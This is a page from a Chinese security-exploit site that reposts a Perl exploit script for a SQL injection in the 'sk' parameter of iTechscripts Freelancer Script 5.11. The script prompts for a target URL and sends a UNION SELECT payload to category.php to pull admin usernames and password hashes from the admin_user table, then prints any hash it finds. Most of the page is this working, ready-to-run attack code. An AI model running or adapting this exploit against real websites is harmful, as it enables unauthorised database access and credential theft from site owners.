首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection
来源:v3n0m[at]outlook[dot]com 作者:v3n0m 发布时间:2017-01-13  
#!/usr/bin/perl -w
 
# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
# Author    : v3n0m
# Contact   : v3n0m[at]outlook[dot]com
# Date      : January, 11-2017 GMT +7:00 Jakarta, Indonesia
# Software  : Freelancer Script
# Version   : 5.11 Lower versions may also be affected
# Price     : US$199.00
# Link      : http://itechscripts.com/freelancer-script/
# Greetz    : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
sub clear{
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
clear();
print "|----------------------------------------------------|\n";
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
print "| Coded by : v3n0m                                   |\n";
print "| Greetz   : YOGYACARDERLINK                         |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$concat="group_concat(username,char(58),password)";
$table="admin_user";
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
$answer = $xf2r->content;
if ($answer =~/([0-9a-fA-F]{32})/) {
    print "\n[+] Admin Password : $1\n";
    print "[+] Success !! Check target for details...\n";
    print "\n";
}
else{print "\n[-] Failed\n";
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cisco Firepower Management Con
·Mozilla Firefox < 50.1.0 - Use
·Firejail - Privilege Escalatio
·SapLPD 7.4.0 Denial Of Service
·Cemu 1.6.4b - Information Leak
·DiskBoss Enterprise GET Buffer
·Microsoft Windows 8.1 (x64) -
·Apple iTunes Notify Script Ins
·Microsoft Windows Kernel - 'wi
·PHP LibGD Heap Buffer Overflow
·DiskBoss Enterprise 7.5.12 - '
·WinaXe Plus 8.7 - Buffer Overf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved